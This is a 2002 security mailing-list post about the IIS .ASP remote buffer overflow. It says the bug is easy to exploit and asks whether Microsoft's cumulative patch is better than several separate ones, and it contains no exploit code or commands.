Testing Of Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

From: Brett Moore (brettat_private)
Date: Fri Apr 12 2002 - 17:13:54 PDT

    Hi All,
    	Probably a more reliable and safe way of testing if this patch is installed
    or not, would be to test 1 of the css holes?

    	The asp bug is very easy to exploit. I had never written a bof exploit
    before and now have one. So there must be plenty in the wild. It is an
    important patch.

    	Which brings me to my main point. Microsoft in all its wisdom has decided
    that 1 big patch is better than 10 little. And as reports are coming in of
    servers crashing and the patch breaking things, ppl will decide not to apply
    the patch yet. This means that even if (for example) the 'breaking part' of
    the patch applys to the code that fixes the css holes, a user can not patch
    themselves against the asp overflow.

    	So what is the general opinion, 1 big patch or 10 little patches?

    Brett